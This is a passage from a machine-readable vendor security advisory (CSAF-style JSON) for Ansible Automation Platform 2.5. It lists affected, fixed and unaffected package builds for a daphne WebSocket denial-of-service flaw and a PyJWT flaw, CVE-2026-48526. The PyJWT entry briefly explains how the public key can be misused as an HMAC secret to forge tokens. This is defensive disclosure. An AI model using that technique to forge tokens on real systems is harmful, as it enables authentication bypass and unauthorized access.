"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "daphne: daphne: Denial of Service via excessive WebSocket message size"
},
{
"cve": "CVE-2026-48526",
"cwe": {
"id": "CWE-347",
"name": "Improper Verification of Cryptographic Signature"
},
"discovery_date": "2026-05-28T16:01:22.805235+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2482734"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in PyJWT, a Python library for JSON Web Token (JWT) implementation. When decoding JWTs, the library fails to validate the use of JSON Web Keys (JWK) in the HMAC algorithm while also supporting asymmetric algorithms. This allows a remote attacker to use the issuer\u0027s public key as the secret key for the HMAC algorithm, leading to the ability to forge JWTs. This vulnerability can result in authentication bypass or unauthorized access.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pyjwt: PyJWT: Authentication bypass due to forged JSON Web Tokens",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important vulnerability in PyJWT allows for authentication bypass and unauthorized access. It occurs when a JWT verifier is misconfigured to accept both symmetric and asymmetric algorithms, and a public JSON Web Key is erroneously used as the HMAC secret. Red Hat products are only affected if they utilize this specific, non-standard verifier configuration.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64"
],
"known_not_affected": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
